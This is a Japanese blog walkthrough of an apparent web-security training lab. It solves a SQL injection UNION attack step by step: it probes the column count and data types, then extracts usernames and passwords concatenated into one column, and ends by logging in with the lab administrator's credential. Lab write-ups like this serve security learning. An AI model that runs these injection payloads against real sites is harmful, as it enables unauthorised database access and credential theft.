Shikata Ga Nai

Private? There is no such things.

SQL injection UNION attack, retrieving multiple values in a single columnをやってみた

Hello there, ('ω')ノ

 

まずは、Petsを選択して。

 

f:id:ThisIsOne:20210222111503p:plain

 

リクエストをリピータへ。

 

f:id:ThisIsOne:20210222111554p:plain

 

はじめにレスポンスからデータのカラム数の模索を。

 GET /filter?category=Pets'+UNION+SELECT+NULL--

 

f:id:ThisIsOne:20210222111749p:plain

 

2つのデータカラムだと成功のレスポンスが。

 GET /filter?category=Pets'+UNION+SELECT+NULL,NULL--

 

f:id:ThisIsOne:20210222111832p:plain

 

ちなみに3つのデータカラムだとエラーが。

 GET /filter?category=Pets'+UNION+SELECT+NULL,NULL,NULL--

 

f:id:ThisIsOne:20210222112753p:plain

 

次にデータ型の模索を。

 GET /filter?category=Pets'+UNION+SELECT+'abc',NULL--

 

f:id:ThisIsOne:20210222111954p:plain

 

1つ目のカラムは数値のようで。

 GET /filter?category=Pets'+UNION+SELECT+123,NULL--

 

f:id:ThisIsOne:20210222112052p:plain

 

2つ目のカラムは、文字列で。

 GET /filter?category=Pets'+UNION+SELECT+123,'abc'--

 

f:id:ThisIsOne:20210222112132p:plain

 

データベースには、usersというテーブルに。

usernameとpasswordの2つのカラムがあるとのことで。

文字列のカラムにはusernameとpasswordの2つのデータが含まれているようなので。

 

GET /filter?category=Pets'+UNION+SELECT+NULL,username||'~'||password+FROM+users--

 

f:id:ThisIsOne:20210222112346p:plain

 

下記でログインすると。

 administrator/34b4wga8jpvbj20nx8da

 

f:id:ThisIsOne:20210222112444p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210222112511p:plain

 

Best regards, (^^ゞ